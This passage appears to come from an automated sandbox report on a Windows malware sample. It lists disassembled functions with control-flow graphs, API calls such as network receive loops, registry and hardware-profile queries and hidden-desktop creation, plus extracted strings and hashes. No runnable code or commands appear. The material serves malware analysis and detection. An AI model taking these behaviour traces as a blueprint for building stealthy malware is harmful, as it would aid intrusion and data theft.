                                                                          • Associated: 00000000.00000002.3214917043.0000000000D57000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3215072405.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_aa0000_file.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: FolderPath$Concurrency::cancel_current_taskErrorLast
                                                                          • String ID: #!r$cannot compare iterators of different containers$cannot get value$type must be boolean, but is $type must be string, but is
                                                                          • API String ID: 1377278223-1634894188
                                                                          • Opcode ID: 982dc2736014b0bf6cc37087394dc8d321c5e23e6d67cc4969d5342bd97ed1bf
                                                                          • Instruction ID: 35876c851a166fdedb0c056215287eee79dd6a25e63fc506247b60599350d4cc
                                                                          • Opcode Fuzzy Hash: 982dc2736014b0bf6cc37087394dc8d321c5e23e6d67cc4969d5342bd97ed1bf
                                                                          • Instruction Fuzzy Hash: 4B430FB4C052688BDB25DF28D994BEDBBB5BF49304F1082DAE44DA7241EB316B84CF51
                                                                          Function 00B3F050 Relevance: 18.9, APIs: 3, Strings: 6, Instructions: 3174COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?,?,?,?), ref: 00B3F1A4
                                                                          • CreateDirectoryA.KERNEL32(?,00000000,00000000), ref: 00B41BF6
                                                                            • Part of subcall function 00B86C20: GetLastError.KERNEL32(?,?,?,00B05C0F), ref: 00B86C87
                                                                          • CreateDirectoryA.KERNEL32(?,00000000,?,?,?,?,00000000), ref: 00B41EDD
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.3214709406.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                          • Associated: 00000000.00000002.3214686212.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3214797936.0000000000BFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3214820584.0000000000C25000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3214834944.0000000000C2A000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3214903550.0000000000D56000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3214917043.0000000000D57000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3215072405.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_aa0000_file.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CreateDirectory$ErrorFolderLastPath
                                                                          • String ID: %asv$,:u$Ml$cannot use operator[] with a string argument with $cannot use push_back() with $h$w
                                                                          • API String ID: 3244528402-2251990608
                                                                          • Opcode ID: 5cc4eb5e4b6386c2a51c9cd8f332a102a19b47f6d16b1a283ae0c741d5588330
                                                                          • Instruction ID: de1964591e69464a22244bf0b8886e9f1ed56676511122637d9b9ba960c2b7db
                                                                          • Opcode Fuzzy Hash: 5cc4eb5e4b6386c2a51c9cd8f332a102a19b47f6d16b1a283ae0c741d5588330
                                                                          • Instruction Fuzzy Hash: 4793EBB4D052A88ADB65DF28D980BEDBBB5BF49344F0081DAD84DA7242DB716F84CF41
                                                                          Function 00B67A80 Relevance: 13.8, APIs: 9, Instructions: 281networksleepCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 10709 b67a80-b67ab8 10710 b67abe 10709->10710 10711 b67e4c-b67e60 10709->10711 10712 b67ac4-b67acc 10710->10712 10713 b67b07-b67b50 call cf1d07 recv call d39c22 10712->10713 10714 b67ace-b67af4 call b68510 10712->10714 10713->10711 10722 b67b56-b67b59 10713->10722 10718 b67af9-b67b01 10714->10718 10718->10713 10720 b67e37-b67e46 Sleep 10718->10720 10720->10711 10720->10712 10723 b67b5f-b67b66 10722->10723 10724 b67daa-b67dd3 call ad3069 call af8660 10722->10724 10725 b67d95-b67da5 recv 10723->10725 10726 b67b6c-b67bc8 call ab8dc0 recv 10723->10726 10728 b67e2f-b67e31 Sleep 10724->10728 10737 b67dd5 10724->10737 10725->10728 10733 b67d43-b67d50 10726->10733 10734 b67bce-b67be9 recv 10726->10734 10728->10720 10738 b67d52-b67d5e 10733->10738 10739 b67d7e-b67d90 10733->10739 10734->10733 10736 b67bef-b67c2a 10734->10736 10742 b67c2c-b67c31 10736->10742 10743 b67c9d-b67cfd call ab63b0 call aa8d50 call b67e70 10736->10743 10744 b67dd7-b67ddd 10737->10744 10745 b67ddf-b67e17 call aa9280 10737->10745 10740 b67d74-b67d7b call ad38f3 10738->10740 10741 b67d60-b67d6e 10738->10741 10739->10728 10740->10739 10741->10740 10746 b67e61-b67e66 call ad8c70 10741->10746 10749 b67c47-b67c51 call ab8dc0 10742->10749 10750 b67c33-b67c45 10742->10750 10765 b67cff-b67d0b 10743->10765 10766 b67d2b-b67d3f 10743->10766 10744->10728 10744->10745 10757 b67e1c-b67e2a 10745->10757 10756 b67c56-b67c9b call cb4ebd recv 10749->10756 10750->10756 10756->10743 10757->10728 10767 b67d21-b67d23 call ad38f3 10765->10767 10768 b67d0d-b67d1b 10765->10768 10766->10733 10770 b67d28 10767->10770 10768->10746 10768->10767 10770->10766
                                                                          APIs
                                                                          • recv.WS2_32(?,00000004,00000002), ref: 00B67B41
                                                                          • recv.WS2_32(00000000,0000000C,00000002,00000000), ref: 00B67BC3
                                                                          • recv.WS2_32(00000000,0000000C,00000008), ref: 00B67BE4
                                                                          • recv.WS2_32(00000000,?,00000008,0F9C7D83), ref: 00B67C9B
                                                                          • recv.WS2_32(?,00000004,00000008), ref: 00B67DA3
                                                                          • __Xtime_get_ticks.LIBCPMT ref: 00B67DAA
                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00B67DB8
                                                                          • Sleep.KERNEL32(00000001,00000000,?,00002710,00000000,?,?,00000328,0000FFFF,00001006,?,00000008), ref: 00B67E31
                                                                          • Sleep.KERNEL32(00000064,?,00002710,00000000,?,?,00000328,0000FFFF,00001006,?,00000008), ref: 00B67E39
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.3214709406.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                          • Associated: 00000000.00000002.3214686212.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3214797936.0000000000BFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3214820584.0000000000C25000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3214834944.0000000000C2A000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3214903550.0000000000D56000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3214917043.0000000000D57000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3215072405.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_aa0000_file.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: recv$Sleep$Unothrow_t@std@@@Xtime_get_ticks__ehfuncinfo$??2@
                                                                          • String ID:
                                                                          • API String ID: 3893897238-0
                                                                          • Opcode ID: f18164efd1e4c23bd0fc19fc65c07688faadd01d3e3fa9cb95c99efc6b500ccf
                                                                          • Instruction ID: 390cad3565a9c65534dfb3deef216d12d80cf222ff3341e5b5a416e9ad31d49e
                                                                          • Opcode Fuzzy Hash: f18164efd1e4c23bd0fc19fc65c07688faadd01d3e3fa9cb95c99efc6b500ccf
                                                                          • Instruction Fuzzy Hash: 65B1BCB1D04308DBEB20DBA8CC89BADBBF5FB44304F244259E454AB2E2DB795D45CB91
                                                                          Function 06B7A230 Relevance: 13.1, APIs: 4, Strings: 3, Instructions: 807registryCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 10787 6b7a230-6b7a27c call 6b7a1e0 10790 6b7a284 10787->10790 10791 6b7a27e-6b7a282 10787->10791 10792 6b7a288-6b7a29e 10790->10792 10791->10792 10793 6b7a2b2-6b7a3fe call 6ba2e00 10792->10793 10794 6b7a2a0-6b7a2ac 10792->10794 10797 6b7a404-6b7a414 10793->10797 10794->10793 10797->10797 10798 6b7a416-6b7a663 call 6ba2fc0 RegOpenKeyExA 10797->10798 10801 6b7a843-6b7a986 call 6b9eba0 call 6bb7720 GetCurrentHwProfileA 10798->10801 10802 6b7a669-6b7a7cd RegQueryValueExA 10798->10802 10812 6b7a9ef-6b7ae32 call 6b79a10 call 6b79970 call 6ba1830 call 6ba19a0 10801->10812 10813 6b7a988-6b7a997 10801->10813 10803 6b7a836-6b7a83d RegCloseKey 10802->10803 10804 6b7a7cf-6b7a7de 10802->10804 10803->10801 10806 6b7a7e4-6b7a7f4 10804->10806 10806->10806 10808 6b7a7f6-6b7a831 call 6b9fe30 10806->10808 10808->10803 10825 6b7ae38-6b7ae48 10812->10825 10815 6b7a99d-6b7a9ad 10813->10815 10815->10815 10817 6b7a9af-6b7a9ea call 6b9fe30 10815->10817 10817->10812 10825->10825 10826 6b7ae4a-6b7af1c call 6b9ff30 call 6b9ea90 call 6ba4900 10825->10826 10833 6b7af22-6b7af32 10826->10833 10833->10833 10834 6b7af34-6b7b0d1 call 6b9ff30 call 6b9ea90 call 6ba4900 call 6b9f800 * 7 call 6ba8ad0 10833->10834 10857 6b7b0d3-6b7b0dd 10834->10857 10858 6b7b0df 10834->10858 10859 6b7b0e9-6b7b0f8 10857->10859 10858->10859 10860 6b7b114-6b7b1bf call 6ba8af0 call 6ba8c00 call 6ba8e00 call 6b9eba0 call 6b9f800 * 3 10859->10860 10861 6b7b0fa-6b7b10e 10859->10861 10861->10860
                                                                          APIs
                                                                            • Part of subcall function 06B7A1E0: GetCurrentProcess.KERNEL32(00000000), ref: 06B7A1F4
                                                                            • Part of subcall function 06B7A1E0: IsWow64Process.KERNEL32(00000000), ref: 06B7A1FB
                                                                          • RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,00000000,?,?,?), ref: 06B7A65B
                                                                          • RegQueryValueExA.KERNEL32(?,?,00000000,00020019,?,00000400), ref: 06B7A7C5
                                                                          • RegCloseKey.ADVAPI32(00000000), ref: 06B7A83D
                                                                          • GetCurrentHwProfileA.ADVAPI32(?), ref: 06B7A97E
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.3216150564.0000000006B70000.00000040.00001000.00020000.00000000.sdmp, Offset: 06B70000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_6b70000_file.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CurrentProcess$CloseOpenProfileQueryValueWow64
                                                                          • String ID: OguZ$qHBX$w9Y
                                                                          • API String ID: 165412945-770912372
                                                                          • Opcode ID: 77e16bbd9f21e1021b9d79eada268ba031558fe2498e33d01925989cd06fae9f
                                                                          • Instruction ID: fdca2285208a33507cae1949bf4a5710ba902e837c0bb2a92f25706d2db00eea
                                                                          • Opcode Fuzzy Hash: 77e16bbd9f21e1021b9d79eada268ba031558fe2498e33d01925989cd06fae9f
                                                                          • Instruction Fuzzy Hash: C1A2EFB4D092A88BDB66CB68D880BDDBBB1AF59304F1481DAD58CB7251EB305BC5CF50
                                                                          Function 00B9AC30 Relevance: 9.2, Strings: 7, Instructions: 484COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 11681 b9ac30-b9ac4e call b9be30 11684 b9b28e-b9b294 11681->11684 11685 b9ac54-b9ac5d 11681->11685 11686 b9ac5f-b9ac61 11685->11686 11687 b9ac63-b9ac69 11685->11687 11688 b9ac83-b9ac89 11686->11688 11689 b9ac6b-b9ac6d 11687->11689 11690 b9ac6f-b9ac80 11687->11690 11691 b9ac8b-b9ac91 11688->11691 11692 b9ac93-b9ac9a 11688->11692 11689->11688 11690->11688 11693 b9aca2-b9acbf call bea020 11691->11693 11692->11693 11694 b9ac9c 11692->11694 11697 b9b278 11693->11697 11698 b9acc5-b9acd7 call ad59b0 11693->11698 11694->11693 11699 b9b27a 11697->11699 11703 b9acd9-b9ace0 11698->11703 11704 b9ad1b-b9ad20 11698->11704 11701 b9b27f-b9b284 call beb040 11699->11701 11712 b9b286-b9b28b 11701->11712 11706 b9acf9-b9ad09 11703->11706 11707 b9ace2-b9acf4 call be9cc0 11703->11707 11708 b9ad2c-b9ade4 call bea7f0 11704->11708 11709 b9ad22-b9ad29 11704->11709 11706->11704 11720 b9ad0b-b9ad16 call be9cc0 11706->11720 11707->11699 11718 b9ae49-b9aeb8 call b9b2a0 * 4 11708->11718 11719 b9ade6-b9adf4 call be7500 11708->11719 11709->11708 11712->11684 11730 b9adf9-b9adfe 11718->11730 11744 b9aebe 11718->11744 11728 b9adf7 11719->11728 11720->11699 11728->11730 11732 b9ae0a-b9ae12 11730->11732 11733 b9ae00-b9ae07 11730->11733 11735 b9ae18-b9ae1d 11732->11735 11736 b9b24b-b9b251 11732->11736 11733->11732 11735->11736 11740 b9ae23-b9ae28 11735->11740 11736->11699 11738 b9b253-b9b25c 11736->11738 11738->11701 11742 b9b25e-b9b260 11738->11742 11740->11736 11743 b9ae2e-b9ae48 11740->11743 11742->11712 11745 b9b262-b9b277 11742->11745 11746 b9aec3-b9aec7 11744->11746 11746->11746 11747 b9aec9-b9aedf 11746->11747 11748 b9aee1-b9aeed 11747->11748 11749 b9af30 11747->11749 11750 b9aeef-b9aef1 11748->11750 11751 b9af20-b9af2e 11748->11751 11752 b9af32-b9af45 call be60e0 11749->11752 11754 b9aef3-b9af12 11750->11754 11751->11752 11757 b9af4c 11752->11757 11758 b9af47-b9af4a 11752->11758 11754->11754 11756 b9af14-b9af1d 11754->11756 11756->11751 11759 b9af4e-b9af93 call b9b2a0 call b9b500 11757->11759 11758->11759 11764 b9afb3-b9b001 call bbb950 * 2 11759->11764 11765 b9af95-b9afae call be7500 11759->11765 11764->11728 11772 b9b007-b9b032 call be7500 call b9b640 11764->11772 11765->11728 11777 b9b038-b9b03d 11772->11777 11778 b9b0d4-b9b0e2 11772->11778 11779 b9b040-b9b044 11777->11779 11780 b9b0e8-b9b0ed 11778->11780 11781 b9b1f1-b9b1fb 11778->11781 11779->11779 11782 b9b046-b9b057 11779->11782 11785 b9b0f0-b9b0f7 11780->11785 11783 b9b1fd-b9b202 11781->11783 11784 b9b20f-b9b213 11781->11784 11786 b9b059-b9b060 11782->11786 11787 b9b063-b9b07b call bbbb00 11782->11787 11783->11784 11788 b9b204-b9b209 11783->11788 11784->11730 11789 b9b219-b9b21f 11784->11789 11790 b9b0f9-b9b0fb 11785->11790 11791 b9b0fd-b9b10c 11785->11791 11786->11787 11804 b9b099-b9b09e 11787->11804 11805 b9b07d-b9b096 call b9b640 11787->11805 11788->11730 11788->11784 11789->11730 11794 b9b225-b9b23e call be7500 call b9bb00 11789->11794 11792 b9b118-b9b11e 11790->11792 11791->11792 11802 b9b10e-b9b115 11791->11802 11796 b9b120-b9b125 11792->11796 11797 b9b127-b9b12c 11792->11797 11813 b9b243-b9b246 11794->11813 11803 b9b12f-b9b131 11796->11803 11797->11803 11802->11792 11810 b9b13d-b9b144 11803->11810 11811 b9b133-b9b13a 11803->11811 11808 b9b0a0-b9b0b0 call be7500 11804->11808 11809 b9b0b5-b9b0bf 11804->11809 11805->11804 11808->11809 11816 b9b0cb-b9b0ce 11809->11816 11817 b9b0c1-b9b0c8 11809->11817 11818 b9b172-b9b174 11810->11818 11819 b9b146-b9b157 11810->11819 11811->11810 11813->11730 11816->11778 11823 b9b0d0 11816->11823 11817->11816 11821 b9b1e0-b9b1eb 11818->11821 11822 b9b176-b9b17d 11818->11822 11829 b9b159-b9b16c call be7500 11819->11829 11830 b9b16f 11819->11830 11821->11781 11821->11785 11826 b9b17f-b9b186 11822->11826 11827 b9b1d6 11822->11827 11823->11778 11831 b9b188-b9b18f 11826->11831 11832 b9b192-b9b1b2 11826->11832 11834 b9b1dd 11827->11834 11829->11830 11830->11818 11831->11832 11838 b9b1ba-b9b1cb 11832->11838 11839 b9b1b4 11832->11839 11834->11821 11838->11821 11841 b9b1cd-b9b1d4 11838->11841 11839->11838 11841->11834
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.3214709406.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                          • Associated: 00000000.00000002.3214686212.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3214797936.0000000000BFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3214820584.0000000000C25000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3214834944.0000000000C2A000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3214903550.0000000000D56000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3214917043.0000000000D57000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3215072405.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_aa0000_file.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: BINARY$MATCH$NOCASE$RTRIM$automatic extension loading failed: %s$no such vfs: %s$sqlite_rename_table
                                                                          • API String ID: 0-1885142750
                                                                          • Opcode ID: d49a50aac1026855318efb2d74c878f99e6a4e6c73b539f7320b64fd6cadb117
                                                                          • Instruction ID: 5f04d0dd98052c70119f0d45dae1415de297da4a3af9f755d3dc7dd5ca7736a8
                                                                          • Opcode Fuzzy Hash: d49a50aac1026855318efb2d74c878f99e6a4e6c73b539f7320b64fd6cadb117
                                                                          • Instruction Fuzzy Hash: 670239B0A007009BEF318F25ED85B6B7BE5EF40704F1444BCE85A9B691DBB1A985CBD1
                                                                          Function 00CCA734 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 263COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 11869 cca734-cca74f 11870 d01476-d01488 11869->11870 11871 c5cb5a 11870->11871 11871->11869 11872 b836b2-b83bbd call c52d5c call aa3350 11871->11872 11877 b83bc2-b83bd4 call c2dbd6 11872->11877 11879 b83bd9-b83e03 call aa3350 11877->11879 11882 b83e08-b8405e RegOpenKeyExA 11879->11882 11882->11871
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.3214834944.0000000000C2A000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                          • Associated: 00000000.00000002.3214686212.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3214709406.0000000000AA1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3214797936.0000000000BFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3214820584.0000000000C25000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3214903550.0000000000D56000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3214917043.0000000000D57000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3215072405.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_aa0000_file.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: $OB4$2$Ml
                                                                          • API String ID: 0-3973776762
                                                                          • Opcode ID: b2f5596595071cb514f062753843ec3b8a1114e7ce4dfa9cd73ae750b2f3190a
                                                                          • Instruction ID: ab50a7dd4ecd55fc82389899ba21d9da3daa5764527af451e8855a1e962d6ae2
                                                                          • Opcode Fuzzy Hash: b2f5596595071cb514f062753843ec3b8a1114e7ce4dfa9cd73ae750b2f3190a
                                                                          • Instruction Fuzzy Hash: D3F169B8D052588BCB15CF98D9816DCBBF1AF4C364F645199E909BB311D7326E81CF28
                                                                          Function 00B66D00 Relevance: 5.8, APIs: 2, Strings: 1, Instructions: 535COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 12800 b66d00-b66d5c 12801 b66f84-b66f98 call ad39b3 12800->12801 12802 b66d62-b66d71 call ad2b99 12800->12802 12801->12802 12809 b66f9e-b66fca call aa8710 call ad38de call ad3962 12801->12809 12807 b66d77-b66d81 12802->12807 12808 b66fcf-b66fd1 call ad2534 12802->12808 12810 b66fd6-b6712d call ad2534 call abae80 call ab63b0 call b87440 call cf3076 call ad59b0 call ad5270 call ad59b0 call ad5270 call ad59b0 call ad5270 12807->12810 12811 b66d87-b66e7f call b8a3a0 call abab20 call abad80 call aa9280 call aa2df0 12807->12811 12808->12810 12809->12802 12873 b67140-b67145 call ab8dc0 12810->12873 12874 b6712f-b67136 12810->12874 12840 b66f35-b66f83 call ab63b0 call ad2baa call aa2df0 * 2 12811->12840 12841 b66e85-b66e8c 12811->12841 12841->12840 12844 b66e92-b66e9e GetPEB 12841->12844 12847 b66ea0-b66eb4 12844->12847 12848 b66eb6-b66ebb 12847->12848 12849 b66f07-b66f09 12847->12849 12848->12849 12852 b66ebd-b66ec3 12848->12852 12849->12847 12857 b66ec5-b66eda 12852->12857 12860 b66edc 12857->12860 12861 b66efd-b66f05 12857->12861 12864 b66ee0-b66ef3 12860->12864 12861->12849 12861->12857 12864->12864 12867 b66ef5-b66efb 12864->12867 12867->12861 12869 b66f0b-b66f2f 12867->12869 12869->12840 12869->12844 12878 b6714a-b67151 12873->12878 12875 b6713a-b6713e 12874->12875 12876 b67138 12874->12876 12875->12878 12876->12875 12879 b67155-b67169 12878->12879 12880 b67153 12878->12880 12881 b6716d-b67184 12879->12881 12882 b6716b 12879->12882 12880->12879 12883 b67186 12881->12883 12884 b67188-b671a4 12881->12884 12882->12881 12883->12884 12885 b671a6 12884->12885 12886 b671a8-b671af 12884->12886 12885->12886 12887 b671b3-b6726f call ad5270 call b8a3a0 12886->12887 12888 b671b1 12886->12888 12893 b67272-b67277 12887->12893 12888->12887 12893->12893 12894 b67279-b672c7 call aa3040 call aa9280 call b8a3a0 12893->12894 12901 b672cd-b67393 call aa8f20 call b8a3a0 12894->12901 12902 b672c9 12894->12902 12907 b67396-b6739b 12901->12907 12902->12901 12907->12907 12908 b6739d-b673cc call aa3040 call aa9280 12907->12908 12913 b673ce-b673d5 12908->12913 12914 b673ed-b673f6 12908->12914 12913->12914 12915 b673d7-b673d9 12913->12915 12916 b67416-b67443 call aa2df0 * 2 12914->12916 12917 b673f8-b673ff 12914->12917 12920 b673dd-b673e4 12915->12920 12917->12916 12918 b67401-b67403 12917->12918 12923 b67407-b6740d 12918->12923 12920->12914 12922 b673e6-b673e8 12920->12922 12922->12914 12923->12916 12926 b6740f-b67411 12923->12926 12926->12916
                                                                          APIs
                                                                          • std::_Throw_Cpp_error.LIBCPMT ref: 00B66FD1
                                                                            • Part of subcall function 00AD2534: __EH_prolog3.LIBCMT ref: 00AD2570
                                                                          • std::_Throw_Cpp_error.LIBCPMT ref: 00B66FE2
                                                                            • Part of subcall function 00B87440: __fread_nolock.LIBCMT ref: 00B87589
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.3214709406.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                          • Associated: 00000000.00000002.3214686212.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3214797936.0000000000BFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3214820584.0000000000C25000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3214834944.0000000000C2A000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3214903550.0000000000D56000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3214917043.0000000000D57000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3215072405.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_aa0000_file.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Cpp_errorThrow_std::_$H_prolog3__fread_nolock
                                                                          • String ID: default
                                                                          • API String ID: 2257151541-3814588639
                                                                          • Opcode ID: 8a31def34abd79659741a29a9c32a2625f0101241a6069c8dd4d7402b9d7a8d9
                                                                          • Instruction ID: 37df887776967eaec7fbd96158975f64c4a2e624b8fc91b2c17593b59eb8dd7d
                                                                          • Opcode Fuzzy Hash: 8a31def34abd79659741a29a9c32a2625f0101241a6069c8dd4d7402b9d7a8d9
                                                                          • Instruction Fuzzy Hash: 81328BB0D04248DFCB14DFA8D9917AEBBB1FF49304F144199E805AB392DB35AE45CB92
                                                                          Function 00B24560 Relevance: 5.6, APIs: 3, Instructions: 1088COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.3214709406.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                          • Associated: 00000000.00000002.3214686212.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3214797936.0000000000BFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3214820584.0000000000C25000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3214834944.0000000000C2A000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3214903550.0000000000D56000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3214917043.0000000000D57000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3215072405.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_aa0000_file.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: ErrorLast
                                                                          • String ID:
                                                                          • API String ID: 1452528299-0
                                                                          • Opcode ID: 734fd8848a698397c40c939b87f2535ec640e059f9caa507f190bd1ed66b8409
                                                                          • Instruction ID: 5447c28000781f2cb8eed5cd283a76d9a4aa77ed1687f71f78abea10ce8edbb7
                                                                          • Opcode Fuzzy Hash: 734fd8848a698397c40c939b87f2535ec640e059f9caa507f190bd1ed66b8409
                                                                          • Instruction Fuzzy Hash: 7FB26A70D00268CBDF24DF68D985BDDBBF5AF59300F1482D9E449AB282DB70AA85CF51
                                                                          Function 06B79080 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 52COMMONLIBRARYCODE
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 13343 6b79080-6b790b0 call 6ba0270 OpenDesktopA 13346 6b790b2-6b790c6 13343->13346 13347 6b7911d-6b79123 13343->13347 13348 6b790d1 13346->13348 13349 6b790c8-6b790cf 13346->13349 13350 6b790d8-6b790e4 13348->13350 13349->13350 13351 6b790e6-6b790f1 13350->13351 13352 6b790f4-6b7911a CreateDesktopA 13350->13352 13351->13352 13352->13347
                                                                          APIs
                                                                          • OpenDesktopA.USER32(?,00000000,00000001,10000000), ref: 06B790A3
                                                                          • CreateDesktopA.USER32(?,00000000,00000000,00000000,10000000,06BEA928), ref: 06B79114
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.3216150564.0000000006B70000.00000040.00001000.00020000.00000000.sdmp, Offset: 06B70000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_6b70000_file.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Desktop$CreateOpen
                                                                          • String ID: HjDBKYOik35wJkl
                                                                          • API String ID: 153846745-2025202260
                                                                          • Opcode ID: 3ab38ddb7d999b1b7de8b76a46c87246154a4c65f99a47855c7767fb8fd3d472
                                                                          • Instruction ID: c82ade8350c6b81bf0abd7dd78278441093ad799530b112ccd33ee6ee8493d6f
                                                                          • Opcode Fuzzy Hash: 3ab38ddb7d999b1b7de8b76a46c87246154a4c65f99a47855c7767fb8fd3d472
                                                                          • Instruction Fuzzy Hash: 4311F3B4E45309AFDB54DF94C855BEEBBB1EB08300F104099E924BB380D3755A84CFA4
                                                                          Function 00B5C80A Relevance: 3.5, Strings: 2, Instructions: 1029COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
